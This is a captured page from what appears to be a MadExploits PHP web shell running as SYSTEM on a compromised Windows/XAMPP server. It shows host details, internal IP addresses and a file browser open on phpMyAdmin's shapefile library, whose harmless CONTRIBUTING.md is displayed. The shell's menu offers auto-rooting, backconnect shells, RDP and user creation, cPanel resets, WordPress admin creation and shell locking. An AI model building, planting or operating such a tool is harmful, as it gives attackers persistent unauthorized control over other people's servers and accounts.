Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
vendor /
phpmyadmin /
shapefile /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxrwxrwx
CHANGELOG.md
1.3
KB
-rw-rw-rw-
CONTRIBUTING.md
877
B
-rw-rw-rw-
LICENSE
17.62
KB
-rw-rw-rw-
README.md
1.92
KB
-rw-rw-rw-
codecov.yml
54
B
-rw-rw-rw-
composer.json
938
B
-rw-rw-rw-
phpunit.xml
808
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CONTRIBUTING.md
# Contributing to shapefile ## Reporting issues Our issue tracker is hosted at GitHub: https://github.com/phpmyadmin/shapefile/issues Please search for existing issues before reporting new ones. ## Working with Git checkout The dependencies are managed by Composer, to get them all installed (or update on consequent runs) do: ``` composer update ``` ## Submitting patches Please submit your patches using GitHub pull requests, this allows us to review them and to run automated tests on the code. ## Coding standards We do follow PSR-1 and PSR-2 coding standards. You can use php-cs-fixer to fix the code to match our expectations: ``` php-cs-fixer fix . ``` ## Testsuite Our code comes with quite comprehensive testsuite, it is automatically executed on every commit and pull request, you can also run it locally: ``` ./vendor/bin/phpunit -c phpunit.xml ```
Close